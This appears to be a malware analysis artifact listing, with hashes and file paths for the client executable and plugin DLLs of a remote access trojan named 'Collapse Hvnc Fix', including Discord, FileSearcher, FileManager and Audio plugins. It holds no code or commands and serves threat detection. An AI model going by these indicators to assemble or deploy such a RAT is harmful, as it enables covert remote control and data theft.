SHA512 a4e8f23db0c73e198e127cdff38507b4173701b99fdfc6bb3af62f398247d368c8208ac9177f710709d0692a47d4f96239e494054244a5373ce4395dfc63ea48

C:\Users\Admin\Desktop\Client.exe

MD5 806c4a1e3eb79086789467aba1721627
SHA1 6fd6541ac570c661f538c505180925c71cc29642
SHA256 f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928
SHA512 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\IP2Region.dll

MD5 cd5a0b0d309fd5837ddacbf4c1a65cda
SHA1 65fbc931f4ba8c5e3b26719665ee9ea6015f402c
SHA256 b0c2a6951dae794c210fbe68d7f42081e5da0f7cbb926cf986c3d453f9920f37
SHA512 84e4e1aa3f6c3014b39b0ac0da3db41e086dfab4e7d38a154f0ff2d0c65bae87039175e54cf950a57f21f5c56c19a62d6f98b2143f14a21d743867a2b37243aa

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Fun.dll

MD5 6498fbaa8d0f46e9cc7eb5350db0d226
SHA1 2b6502e636cf3a307fdd9417c33215e95fe133ce
SHA256 1aacbe29bc2ba2fa3b23e632ba4d0f31b21d9b7517230af75b943eed06e42c10
SHA512 3df2476cff49da2e322693ff5751d8cbbbffa03e063e9a74b3141e95f99e03a6ddc84d4ded4d2bd28937135e73615f6b9d810741a864d196c7aab4089d744c6e

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Discord.dll

MD5 7a9892f86badfa7560fd9182a775fb73
SHA1 4ac58c122bdf7ad51e3ba8ff6151b545a258ec34
SHA256 84c4a1f90507955ce9ff3e8c260bbacdb57b4d230853d2fe1379fdbc98938c7b
SHA512 6b646d83011444972c8b9b38f886035d4bef498d40299ebc3f80da1fc7b3d3b02fbdff1fb355574059f1a6309ebaeeba7aa8f7aa26c99b7452bcaa1ad04259ec

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileSearcher.dll

MD5 965f3d108d5995ba6214b32ce416d669
SHA1 3c2c219e053b3a692e37a59cd28db702da2af8d9
SHA256 05ee33a9f85545c43fbab3443751cdd0b151147f4665cfd3a661bae610b8e6b0
SHA512 f6d041219f5f5f1ee270812e5b4565465ce7c245636661d296a4dbd93b672bf1c3eaff890f84766c8f6b81ca14d5680e9bf8ed0c8a470018733c38dcb3897753

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileManager.dll

MD5 5d429feae7e6513205802ccdd0012a90
SHA1 0262c5caa56e33af56ac1e2799bfe9fd5f4f5977
SHA256 b2417948b649d6575597e82c87903a83b0d575776180b5aa3f4c2fb03504b488
SHA512 db865c7262330818682e3d6a011e07ff6b79c70ba3507e1206cbf2b88b9d9e4bbf888384b71ce27993296c21f2a883aa8de6f435aaf9a7a8a6e8a2c80720b468

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Extra.dll

MD5 f5bf218ad015cae03530be7c8f0868a9
SHA1 d47c3936fded28dd4330f1aac7881d8bb17a1d02
SHA256 42b16d214b9336027c3e854c119739fac4cceac6e91045f69d1db18144b538bd
SHA512 a6c5a0cf8834de88b8df202c94de30521af3e7f8edfa213e896dac1c03096faa128fa38555bd9683d3d5819cdd34572f7cf061b9f841b823e13db9325cb5f090

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Audio.dll

MD5 c16fccda2cdcf374df662c8035ed287c
SHA1 ed32b20dde3c884d80eab36a7096fbcb9432fbeb
SHA256 158e664b0976c0ae9594d7f57ff44ba298ca50dcf43fcdb76df5ff1893537800
SHA512 50a8b94b4089f59113a92033f685aa8037131d96423d412b53326a1c9f46529654e0776858977aae1448b4be3b16cd83c9eda5cf5352464a156f2343ff7c5480
